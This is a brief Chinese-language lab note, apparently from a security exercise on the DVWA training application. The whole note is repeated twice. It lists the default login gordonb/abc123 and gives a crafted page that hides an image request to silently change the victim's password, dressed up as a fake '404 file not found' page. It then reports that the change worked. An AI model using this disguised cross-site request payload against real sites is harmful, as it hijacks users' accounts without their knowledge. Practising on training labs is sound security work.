原来
登陆账户:gordonb
登陆密码:abc123
构造html:
<img src="http://192.168.131.146/dvwa/vulnerabilities/csrf/?password_new=test123&password_conf=test123&Change=Change#" border="0" style="display:none;"/><h1>404<h1><h2>file not found.<h2>
修改成功: 登陆密码为test123
原来
登陆账户:gordonb
登陆密码:abc123
构造html:
<img src="http://192.168.131.146/dvwa/vulnerabilities/csrf/?password_new=test123&password_conf=test123&Change=Change#" border="0" style="display:none;"/><h1>404<h1><h2>file not found.<h2>
修改成功: 登陆密码为test123